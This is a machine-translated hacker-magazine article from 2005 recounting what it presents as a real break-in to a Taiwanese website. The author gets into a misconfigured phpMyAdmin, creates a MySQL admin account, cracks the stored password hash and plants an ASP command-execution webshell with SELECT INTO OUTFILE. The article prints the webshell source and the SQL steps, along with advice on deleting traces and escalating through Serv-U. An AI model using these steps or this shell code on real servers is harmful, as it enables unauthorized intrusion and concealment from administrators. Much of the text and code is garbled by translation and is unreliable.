Get the Webshell (MySQL Backup Webshell) with mysql

Get the Webshell (MySQL Backup Webshell) with mysql

This article has been published to "hacker X file" 2005 No. 1, please load the famous source: hacker x element

Author: xack3remail: xack3r@xhacker.cnhttp: //www.xhacker.cn This article is a summary, boring, getting a test, a Web site in Taiwan, and get a topic! When you start getting a web address, ping operations, then call up the X-Scan scan, the target host only opens 21, 80, 3306, 8080 ports, and does not report any vulnerabilities. The operating system is Windows 2003, which is obvious to use IIS servers. The ports of the Telnet service are determined Banner. The target host uses IIS, Serv-U FTPv5.2, MySQL4.0.21-NT. The new version has not found a vulnerability, and the overflow is unlikely.

Intrusion Analysis: Let's first analyze his web program, use PHP MySQL, and also set up an ASP forum. The whole station has no multi-user cluster, but uses the administrator backbenge to add deletion and other operations, and the ASP forum provides uploading. At present, only from injection and upload deception. First www.target.com.tw/admin, the administrator's background landing interface has not been deleted, but after I am free to enter admin, admin, "I can't find this page", obviously the place where the background landing has been manipulated. Modified, depressed, guessing does not manage the management page, the structure is extremely trouble for me, but there is a quick management of the navigation bar on the left side of the program. Of course, the general situation can only be managed, and it will open a connection. The result is warned, but we have been very important because the administrator does not completely process the PHP background file, causing the call to make an error. The wrong mistake is as follows: Fatal error: Cannot Instantiate Non-Existent Class: html_template_it in d: /www/target/bussiness/admin/mmoney/money_news_list.php on line 20 can be said to be the web path we have inadvertently fettered. At least when writing some files, we will take less detours. Then we submit the vulnerability testing, upload, capture, and deceive the camouflage, upload, the resulting code limit, uploaded, and finally I thought it was ended, but the 8080 of the target machine caused my attention, entered www.target.com.tw:8080, "Welcome PHPMYADMIN 2.6.0-RC1", this is not, I said. . PHPMYADMIN manages the program of the Mysql database as a web mode, but the eye is "must set $ cfg ['PMaabsoluteUteuri'] in the setup" "," Mysql version 4.0.21-NT is executed in localhost, login "Root @ localhost". This is an error on the Config.inc.php setting below phpMyadmin. We can directly access and do not request input passwords. We can see $ cfg ['servers'] [$ I] ['Auth_Type'] = 'config'; for the default setting, we know that the PHP installation mode uses http when the PHP installation mode is apache And cookie; if the PHP installation mode is CGI, you can use cookie; default is config, this is a dangerous setting, we can do not need to log in to PHPMYAdmin. And login in local root. Let's check the permissions, as shown in Figure 1. The administrator has established a user to use the Web program, and the root is not cleaned or restricted, all privileges all permissions. In this way, we can build a MySQL administrator, the result is expected, there is no error prompt, successfully established a mysql administrator account. There is no more points in this article for operating phpmyadin, here is not more. Oh, there is an administrator account, we can do a lot of things. Of course, the purpose is only one server permission. At that time, there was still no completion in the middle. Take an operation of adding system administrators.

Connect with our established users, remember that the Eat has developed a supermysql (MySQL database connection program), we do not have to install MySQL or other database software locally, SuperMysql is enough to let us execute the command and view the database content. We fill in the IP to log in with the username and password you have just established. The login success will display the prompt box, click the confirmation interface as shown in Figure 2, we open the "mysql" database, you can see the database administrator's password, but it is over. Oh, in order to hide, we crack one of them, it will be more convenient in the future, so as not to be discovered by the administrator. "Workers must have a good fault, must be aware of this, thank you xuanniao's big brother Crackmysql (breaking 7-digit password as long as 10 minutes) speed it is fast, no matter how much, let him run. It is the same that the encrypted password is the same, and the administrator is so negligent. Cut the encrypted password, no five minutes, password, 7851465. Oh, now we can delete the user we have just established, log in with its administrator account, because when writing this article, the invasion has passed, this is no longer Luo, I will use Supermysl to connect with root. However, the connection failed, Best can't help, finally returned to phpmyadmin, you can see that root can only be connected to local connections from Figure 1 (host is localhost). Another user means "any host" (% wildcard), which is also the least inaccurate place.

I think the next step has already understood, through the MySQL Database Backup MySQLDataWebshell. Remember, Superhei wrote an AutoGetWebshell (PHP language, just enter the remote mysql address, library name, user name, password, code, and a writable web directory, directly export a WebShell) to try, fill in Related data, click Submit, the result is not connected to success, of course, if you can't export it, I am a local set, I think it is a local problem, put it in my own space, the result is the same, the return page is " Unable to find a web page "I don't know if the author code is incomplete, because PHP is also in learning, there is no more than a power to see the code of AutoGetWebshell, it seems that only it is doing it. I have seen the backup a shell article written by SWAN, and MSSQL encountered character transitions when exporting files, so that the code is impossible to interpret it. Also in MySQL to exist such problems. We use the "NT and Win2000" reference through MySQL input to the database through the SQL statement, and then export the script to the web directory of the target host. For details, please refer to the original text, enter the command as shown in Figure 3: If the execution is successful, it will return to the mysql / bin directory. If there is such a table or cmd2.php of the target host, the script will be invalid. From the browser, although we have got a guest authority shell, but through this shell script, it can't write something, and it is said that this shell is the System shell, here, not a similar. Crash, it seems that only change shell trial. Since the server has an ASP Forum, pull out the simple ASP back door, construct a SQL file! Use Target; CREATE TABLE XACK3R (CMD text); // Create a XACK3R table, a text data for a CMD field, the following is the content of the SQL statement inserting the ASP Trojan.

insert into XaCk3r values ​​( '<% @ Language = VBScript%> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject ( "WSCRIPT.SHELL") Set oScriptNet = Server. CreateObject ("wscript.network") set ofilesys = server.createObject ("scripting.filesystemObject") szcmd = request.form (". Cmd") IF (Szcmd <> ") Then Sztempfile =" C: / "& OfileSys .GetTempname () Call Oscript.run ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if%>

 <% IF (isobject (ofile) Then ON Error Resume Next Response.Write Server.htmlencode (Ofile.Readall) Ofile.Close Call OfileSys.deletefile (Sztempfile, True) End IF%>   '); select * from xack3r instfile' d: //www/target//xack3r.asp '; // then exported to Web catalog in. Then turn back to the mysql directory, enter the command: mysql -h ip -u usename -p 
Is it still a line of input, try it! Then use the cat's supermysql to connect: Enter the following command; explain here, "a difficult and true invasion" a year ago, now read again, some places do not be similar. For example, inserting the code to the table, the original INTO TMP VALUES (/ "<% DIM OSCRIPT /") is used in the inverse slope (/), and I don't know if the article on the network is not intentional. I haven't read it in the original text. In this article, you can also see that INSERT INTO XACK3R VALUES ('Code Content') is single-class ('), so that it can be performed, otherwise it will fail. Below we enter the following command in SUPERMYSQL. Use target; cmd text); ASP back door has to be entered on a line, however, use the Yiyou Super Dictionary Builder to save the dotmanship, and the use of everyone should be clear. carry on. INSERT INTO XACK3R VALUES ('<% @ language = vbscript%>); ?????????????????????? INSERT INTO XACK3R VALUES ('  ') However, fortunately, the input is popped up to send a successful message box. The last step is to export the ASP file! Everyone can see the ASP back door written in the table and send a successful prompt box from Figure 4. Visit http://www.target.com.tw/xack3r.asp, dizzy! "Can't find this page you are looking for, may have been removed, maybe it has changed, or you can't use it. ??????" Actually, this is clear all over me! We clearly see the code inside, why do you have access to it, it is really a good question, and there are no answers to the master. Is it! ! ! It is impossible, exporting things are can't be swallowed by third-party software, that is not there. Is it difficult to pay for it, we still return to the mysql environment. Try, try to write two statements in the SQL file and save it as a SQL file. Use target; select * from xack3r intfile 'd: //www/target//xack3r.asp'; then return to the mysql environment, enter mysql -h xxx.xxx.xxx.xxx -u usename -p 
The code is as follows:      write is smooth. The exported news is also sent success, access http://www.target.com.tw/xack3r.php, surprise! It's really unsatisfactory. As shown in Figure 5, this time we can upload anything from this back door, of course, there is no more stronger PHP back door. In fact, we can not use so trouble, can still construct a lot of things in SQL files, from "Invasive NT and Win2000" through MySQL, you can see CMD2.php, all double quotes (") in the mysql files are added before A bevel (/), as well as the backsque rod (/) in front of this symbol (-), because considering the mysql language structure "and - the post-imported statement is not prototype And use anti-way to make a translision, and friends who have learned C language should know! After processing, enter MySQL in the CMD environment, execute mysql -h ip -u usname -p      '); select * from xack3r intfile' d: // www / / TARGET//xack3r.php '; / / then exported to the web directory. DROP TABLE XACK3R; / / Delete table operation. Some of the above operations We did not have this statement, actually use it, and it is best to delete this table after exporting, so as not to discover, it cannot be negligent.
Continue access, http://www.target.com.tw/xack3r.php appear a code warning, as shown in Figure 6: Warning: unExpected Character in Input: '/' (ASCII = 92) State = 1 in d: / www / TARGET/index/xack3r.php on line test discovered that this warning did not affect my functionality of my PHP uploading the back door, it can be uploaded normally! Here, I want to invade you can tell a paragraph, then upload an ASP or PHP super management latte. After going, I discovered that his system partition can be written, and go to C: / Program Files, we can see the administrator installation Some software. Figure 7: Hoho, I want to have a few software everyone is familiar with it, start our Upload ASP back door, is it because it died. But I think it is a big breakthrough in the host authority. Servudaemon.ini believes that everyone will also break through a lot of hosts, as for related breakthroughs, please refer to "Coordination by ASP Trojan with SERV-U to obtain administrator privileges", this article is almost almost over. Finally, although it is said that there is a coincidence in the case of this article, but it also costs a lot of turn. Take the host, we still set it simple to it, start with the web, the defect at the beginning of the target host is that the phpmyAdmin configuration is not appropriate, with several deadly places. Edit the config.inc.php file under the back door of the ASP, we have found some places as previously expected. A: $ CFG ['Servers'] [$ I] ['Auth_Type'] = 'cookie'; // Here I should change to http or cookie, the original config.inc.php file is config! This is the main one. B: $ cfg ['pmaabsoluteuri'] = 'http://www.target.com.tw/phpmyadmin/'; the original text is empty, and it is also a dangerous setting. C: There is still something that is not to determine if the administrator manages the database through the distance. If it is a remote, then our operation is important to the root. If you move the root, you can't remotely connect PHPMYADMIN, it is not exposed! Suppose is a negligence, and the root user has not been properly handled correctly, and there is no remote management. So $ cfg ['servers'] [$ I] ['user'] = 'root'; this place should go to ROOT, This will not cause us to browse all databases directly from the Web, and our identity is ROOT @ localhost. If you come back, if the administrator logs in to manage MySQL data from PHPMYADMIN, he should be aware of this security problem, so we do the change is right.
For security reasons, it is best to set specialized users and permissions for phpMyadmin. Here we are set to target, password is 7851465, which can only read tables in Target database: Grant Select on target. * To target @ Localhost Identified by "7851465"; then editing phpMyadmin's config.inc.php file $ cfgservers [1] ['controluser'] = 'target'; $ cfgservers [1] ['controlpass'] = '7851465'; Intrusion process It ends here. Summary: This article is also a real intrusion process. It is also written on the basis of some similar articles. Comprehensive use of some knowledge, there are some problems that have not been solved by the aforementioned article! Working, I hope that the majority of friends can understand. This article provides only a kind of idea, focusing on solving some articles in the shortage of export shell, and the results I have repeatedly tried, I hope to communicate with more people. However, if you have a scan for the majority of 3306 ports, if you find that there is a root empty password, there is no so much confused. Of course, it is better to use the tools written by others, but there are still many bugs in some tools. It is not necessarily that it can be implemented so smooth in our hands. More still rely on yourself to help test, to make up for some of the shortcomings of some software authors, this should be a spirit! Welcome and I will communicate with me XACK3R QQ: 83578988 E-mail: xack3r@xhacker.cn Htpp: //www.xhacn article related attachment can be searched in Google!